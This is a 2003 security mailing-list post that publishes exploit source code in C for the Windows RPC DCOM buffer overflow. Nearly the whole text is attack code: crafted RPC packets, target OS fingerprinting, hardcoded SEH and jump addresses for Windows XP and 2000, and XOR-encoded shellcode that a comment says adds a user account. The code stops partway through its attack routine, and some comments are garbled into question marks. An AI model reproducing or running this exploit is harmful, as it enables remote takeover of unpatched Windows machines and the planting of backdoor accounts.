[EXPL] Windows RPC Universal Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 10/09/03

  • Next message: SecuriTeam: "[UNIX] Multiple SQL Injection Vulnerabilities in DeskPRO"
    To: list@securiteam.com
    Date: 9 Oct 2003 15:05:52 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Windows RPC Universal Exploit
    ------------------------------------------------------------------------

    SUMMARY

    The following exploit code is a universal exploit code for the Windows RPC
    security vulnerability we reported earlier. This more advance exploit code
    doesn't use static addresses for jumps.

    DETAILS

    Exploit:
    /* http://www.security.nnov.ru/files/rpcdcom3.c
    1) ???????????? ???: *.exe 127.0.0.1 ->????????
    2) *.exe 192 168 1 1 100 - ?????????? ??????? ??????? ? ?????????, ?????
    ???-?? ??????...
    3) ?????!!! ??? ??????? ???????? ?? bshell2, ? ???? ????? ???????? ???
    ????-???, ??? ??
    ????? ?????????? ???????? ??? ?????? heap ? ???????? ??? ????-????.
    Modification (c) [karlss0n]
    */

    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>

    FILE *fp1;
    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
    0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask)
    {
      for(int i=offset;i<(offset+lenght);i++)
       buf=buf^mask;
    }
    DWORD GETSTRCS(char *buf)
    {
      DWORD cs=0;
      bool cld=false;
      for(unsigned int i=0;i<strlen(buf);i++)
      {
       for(int z=0;z<13;z++)
       {
       if(cs&1) cld=true;
       cs=cs>>1;
       if(cld) cs=cs|0x80000000;
       cld=false;
       }
       cs+=buf;
      }
      return cs;
    }

    struct {
      DWORD seh;
      DWORD jmp;
      DWORD heap;
      char target[200];
    } target_os[]=
    {
      {
       0x005Bfd2c,
       0x00081eeb,
       0x00180000,
       "WinXP"
      },
      {
       0x0095fd3c,
       0x00081eeb,
       0x00170000,
       "Win2K"
      }
    },v;
    unsigned char rawData1[]=
     "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
     "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

     "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
     "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
     "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
     "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"

    //SHELLCODE From SAM ,THANKs !
    //Add user SST,password is 557,
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"

    "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
    "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
    "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
    "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
    "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
    "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
    "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
    "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
    "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
    "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
    "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
    "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
    "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
    "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
    "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
    "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
    "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
    "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

     "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
     "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
     "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
     "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
     "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
     "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
     "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
     "\x90\x90\x90\x90\x90\x90\x90\x90"
     "\x77\xe0\x43\x00\x00\x10\x5c\x00"
     "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
     "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your
    target's os

    //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my
    artic
    //"Utilization of released heap structure and exploit of universal Heap
    overflow in windows ".
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
    "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
    "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
    "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
    "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
    "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
    "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
    "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
    "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
    "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
    "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
    "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
    "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
    "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
    "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
    "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
    "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
    "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
    "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
    "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
    "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
    "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
    "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
    "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
    "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

    "\x04\x04\x00\x70\x00\x04\x40"
    "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";

    int version(char ip[16], int sock)
    {
    //un poco de ettercap...

    unsigned char peer0_0[] = {
    0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
    0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
    0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
    0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
    0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
    0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
    0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
    0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00 };

    unsigned char peer0_1[] = {
    0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
    0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
    0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
    0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
    0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
    0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
    0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
    0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
    0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
    0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
    0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x07, 0x00 };

    /*

    unsigned char win2kvuln[] = {
    0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00};
    */
      fd_set fds2;
      unsigned char buf[1024];

      int l;
      struct timeval tv2;
      FD_ZERO(&fds2);
      FD_SET(sock, &fds2);
      tv2.tv_sec = 6;
      tv2.tv_usec = 0;

      memset(buf,'\0',sizeof(buf));
      send(sock,(char *)peer0_0,sizeof(peer0_0),0);
      if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
      {
       l=recv (sock, (char *)buf, sizeof (buf),0);
    // for(i=0;i<52;i++)
    // {
    // if (i==28) i=i+4;
    // if (buf[i+32]!=win2kvuln)
    // {
         send(sock,(const char *)peer0_1,sizeof(peer0_1),0);
         if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
         {
           memset(buf,'\0',sizeof(buf));
           l=recv (sock, (char *)buf, sizeof (buf),0);
           if (l==32)
           {
            closesocket(sock);
            return(1);//winxp
           }
           else
           {
           #ifdef WIN32
           closesocket(sock);
           #else
           close(sock);
           #endif
           return(0);//win2kby default. Nt4 not added..
           }
         }
         else return(-1);
    // }

       //}
    // closesocket(sock);
    // return(0);//win2k
      }
      closesocket(sock);
      return(-1); //Unknown
    }
    /********************************************************************************/
    int attack(char *ip1,bool atack)
    {
      unsigned char rawData[1036];
      memcpy(rawData,rawData1,1036);
      unsigned char shellcode[50000];
      char ip[200];
      strcpy(ip,ip1);
     WSADATA WSAData;
     SOCKET sock;
     int len,len1;
     SOCKADDR_IN addr_in;
     short port=135;
     unsigned char buf1[50000];
     unsigned char buf2[50000];

      printf("%s\n",ip);
     //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
     //printf("Code by FlashSky,Flashsky xfocus org\n");
     //printf("Welcome to our Site: http://www.xfocus.org\n");
     //printf("Welcome to our Site: http://www.venustech.com.cn\n");
    /* if(argc!=3)
     {
       printf("%s targetIP targetOS\ntargets:\n",argv[0]);
       for(int i=0;i<sizeof(target_os)/sizeof(v);i++)
        printf("%d - %s\n",i,target_os.target);
        printf("\n%x\n",GETSTRCS(argv[1]));
       return;
     }
    */
    /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
     {
      printf("WSAStartup error.Error:%d\n",WSAGetLastError());
      return;
     }
    */
     addr_in.sin_family=AF_INET;
     addr_in.sin_port=htons(port);
     addr_in.sin_addr.S_un.S_addr=inet_addr(ip);
      
     if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
     {
      printf("Socket failed.Error:%d\n",WSAGetLastError());
      return 0;
     }
     len1=sizeof(request1);

     len=sizeof(rawData);

     if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in), NULL,
    NULL, NULL, NULL)==SOCKET_ERROR)
     {
      printf("%s - connect failed\n",ip);
      return 0;
     }

      int vers=!version(ip,sock);

    // printf("%d\n",vers);
    // return;
    // int vers=1;

      FILE *fp;

      //?????? ?????
    // fp=fopen("shellcode","rb");
    // fread(rawData,1,1036,fp);
    // fclose(fp);
      //?????? ????? ???????? ??????????????? ??????????? ???????!

      fp=fopen("bshell2","rb");
      int sz=fread(shellcode,1,1024,fp);
      fclose(fp);
    // printf("%d\n",sz);
      for(int i=0;i<sz;i++)
       rawData[i+0x71]=shellcode;
    // fp=fopen("badfile.exe","rb");
    // unsigned int sz1=fread(shellcode,1,50000,fp);
    // fclose(fp);
    // for(i=0;i<sz1;i++)
    // rawData[i+0x240]=shellcode;

    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);

    // return;

      
      //????? ??? ??? ??????? ??????? ????? ?????????? HEAP'a
    // DWORD heap=0x00180000;
    // int k=vers;
    // vers=1;
    // *(DWORD *)(rawData+0xae)=target_os[vers].heap;
      *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap;
      //?????? ????? ?????????? ??? ???, ??? ???? ????? ???????? ?????? ???
    // ?????, ??? ????? ?????? ? ???????? ????????, ??????? ?????????? ????, ?
    ????????
    // ??????
      XOR(rawData,0x71,sz,0x99);
    // XOR(rawData,0x240,sz1,0x99);
      //??? ?? ??? ????? ???????? ?????? ??? SEH ? JMP
      DWORD seh=target_os[vers].seh;
      DWORD jmp=target_os[vers].jmp;
      *(DWORD *)(rawData+0x22a)=jmp;
      *(DWORD *)(rawData+0x22e)=seh;
    // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz));
      *(WORD *)(rawData+0x62)=sz;

      memcpy(buf2,request1,sizeof(request1));
     *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2;
     *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2;
     memcpy(buf2+len1,request2,sizeof(request2));
     len1=len1+sizeof(request2);

     memcpy(buf2+len1,rawData,sizeof(rawData));
     len1=len1+sizeof(rawData);

     memcpy(buf2+len1,request3,sizeof(request3));
     len1=len1+sizeof(request3);
     memcpy(buf2+len1,request4,sizeof(request4));
     len1=len1+sizeof(request4);
     *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

     *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
     *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
     *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
     *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
     *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
